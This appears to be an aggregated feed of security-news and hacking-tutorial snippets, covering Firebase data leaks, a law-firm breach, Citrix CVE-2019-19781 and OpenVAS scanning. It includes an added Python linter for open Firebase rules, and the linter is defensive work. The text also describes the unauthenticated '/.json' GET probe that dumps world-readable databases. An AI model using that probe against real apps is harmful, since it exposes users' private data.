Credits: BBC. Interserve, which helped build Birmingham's NHS Nightingale hospital, and Bam Construct, which delivered the Yorkshire and the Humber's, have reported the incidents to authorities. Earlier this month, the government warned healthcare groups involved in the response to […]
http://blog.extremehacking.org/blog/2020/05/13/cyber-attacks-hit-hospital-construction-companies/

Researchers spot thousands of Android apps leaking user data through misconfigured Firebase databases
Credits: The Register. Security researchers at Comparitech have reported that an estimated 24,000 Android apps are leaking user data because of misconfigured Firebase databases. Firebase is a popular backend service with SDKs for multiple platforms, including Android, iOS, web, C++ and Unity (for […]
http://blog.extremehacking.org/blog/2020/05/13/researchers-spot-thousands-of-android-apps-leaking-user-data-through-misconfigured-firebase-databases/
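
The "misconfiguration" behind the leaks in the entry above is almost always a Firebase Realtime Database left in its test-mode rules, where `.read` and `.write` are simply `true` at the root, so anyone who learns the project ID can pull the whole database with a single unauthenticated GET to `https://<project-id>.firebaseio.com/.json`. The following added example (not code from the article or from Comparitech's research) lints a rules document for exactly that class of grant. `OPEN_RULES` and `SCOPED_RULES` are constructed: the first is the test-mode default, the second a per-user hardening of it with one deliberately public subtree.

```python
"""Lint Firebase Realtime Database security rules for world-open paths.

Added example, not from the article above. The two rule documents are
constructed for illustration.
"""
import json
from typing import List, Tuple

# The "test mode" default that most leaking apps shipped with: world read/write.
OPEN_RULES = json.dumps({"rules": {".read": True, ".write": True}})

# Per-user hardening: each user can only touch /users/<their own uid>;
# /public_config is readable by design and has no write rule (default deny).
SCOPED_RULES = json.dumps({
    "rules": {
        "users": {
            "$uid": {
                ".read": "auth != null && auth.uid === $uid",
                ".write": "auth != null && auth.uid === $uid",
            }
        },
        "public_config": {".read": True},
    }
})


def _normalize(expr) -> str:
    """Rule values may be a JSON boolean or a string expression; unify them."""
    if isinstance(expr, bool):
        return "true" if expr else "false"
    return " ".join(str(expr).split())


def find_open_paths(rules_json: str) -> List[Tuple[str, str, str]]:
    """Return [(path, permission, severity)] for grants not tied to the caller.

    severity "open"     : anyone on the internet, no credentials needed
    severity "any-user" : any signed-in account, which is trivial to obtain
                          when anonymous or self-service email sign-up is on
    Grants cascade downward in Realtime Database rules and cannot be revoked
    by a child rule, so a finding at "/" covers the entire database.
    """
    findings: List[Tuple[str, str, str]] = []

    def walk(node: dict, path: str) -> None:
        for key, value in node.items():
            if key in (".read", ".write"):
                expr = _normalize(value)
                if expr == "true":
                    findings.append((path or "/", key, "open"))
                elif expr == "auth != null":
                    findings.append((path or "/", key, "any-user"))
            elif isinstance(value, dict):          # a child location (or $wildcard)
                walk(value, f"{path}/{key}")
            # .validate / .indexOn and other non-dict keys are not access grants

    walk(json.loads(rules_json)["rules"], "")
    return findings


if __name__ == "__main__":
    for label, doc in (("test-mode rules", OPEN_RULES), ("scoped rules", SCOPED_RULES)):
        print(label, "->", find_open_paths(doc) or "no unscoped grants")
```

The empirical counterpart to this lint is the probe Comparitech's scan relied on: an unauthenticated `GET /.json` on the database host returns the data when the root is world-readable and `{"error":"Permission denied"}` with HTTP 401 when it is not. Note that an `"auth != null"` grant passes that probe but still exposes every user's data to every other user of the app.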

Papa don't breach: Contracts, personal info on Madonna, Lady Gaga, Elton John, others swiped in celeb law firm ‘hack'
Credits: The Register. Hackers are threatening to release 756GB of A-list celebs' contracts, recording deals, and other personal info allegedly stolen from a New York law firm. The miscreants have seemingly got their hands on confidential agreements, private correspondence, contact […]
http://blog.extremehacking.org/blog/2020/05/13/papa-dont-breach-contracts-personal-info-on-madonna-lady-gaga-elton-john-others-swiped-in-celeb-law-firm-hack/

CVE-2019-19781: Citrix ADC RCE vulnerability
A week before the 2019 holidays Citrix announced that an authentication bypass vulnerability was discovered in multiple Citrix products. The affected products are the Citrix Application Delivery Controller (formerly known as NetScaler ADC), Citrix Gateway (formerly known as NetScaler Gateway), and the Citrix SD-WAN WANOP appliance. Exploiting the vulnerability could allow an unauthenticated attacker [...]
https://www.hackingtutorials.org/exploit-tutorials/cve-2019-19781-citrix-adc-rce-vulnerability/

Vulnerability Scanning with OpenVAS 9 part 4: Custom scan configurations
For all scans so far, we've only used the default scan configurations such as host discovery, system discovery and Full & fast. But what if we don't want to run all NVTs on a given target (list) and only test for a few specific vulnerabilities? In this case we can create our own custom scan [...]
https://www.hackingtutorials.org/scanning-tutorials/openvas-9-part-4-custom-scan-configurations/

Vulnerability Scanning with OpenVAS 9 part 3: Scanning the Network
In the previous parts of the Vulnerability Scanning with OpenVAS 9 tutorials we have covered the installation process and how to run vulnerability scans using OpenVAS and the Greenbone Security Assistant (GSA) web application. In part 3 of Vulnerability Scanning with OpenVAS 9 we will have a look at how to run scans using different [...]
https://www.hackingtutorials.org/scanning-tutorials/vulnerability-scanning-with-openvas-9-scanning-the-network/

Vulnerability Scanning with OpenVAS 9 part 2: Vulnerability Scanning
In the previous tutorial, Vulnerability Scanning with OpenVAS 9.0 part 1, we've gone through the installation process of OpenVAS on Kali Linux and the installation of the virtual appliance. In this tutorial we will learn how to configure and run a vulnerability scan. For demonstration purposes we've also installed a virtual machine with Metasploitable 2 [...]
https://www.hackingtutorials.org/scanning-tutorials/vulnerability-scanning-openvas-9-0-part-2/

Vulnerability Scanning with OpenVAS 9 part 1: Installation & Setup
A couple of years ago we did a tutorial on Hacking Tutorials on how to install the popular vulnerability assessment tool OpenVAS on Kali Linux. We've covered the installation process on Kali Linux and running a basic scan on the Metasploitable 2 virtual machine to identify vulnerabilities. In this tutorial I want to cover more details [...]
https://www.hackingtutorials.org/scanning-tutorials/vulnerability-scanning-openvas-9-pt-1/

The Best Hacking Books 2018
One of the most popular and most asked questions since I've started this blog is if I can recommend some good hacking books to read for beginners and more experienced hackers and penetration testers. In this article I want to highlight some hacking books and InfoSec books that I personally liked that cover subjects such as ethical hacking, [...]
https://www.hackingtutorials.org/infosec-books/the-best-hacking-books-2018/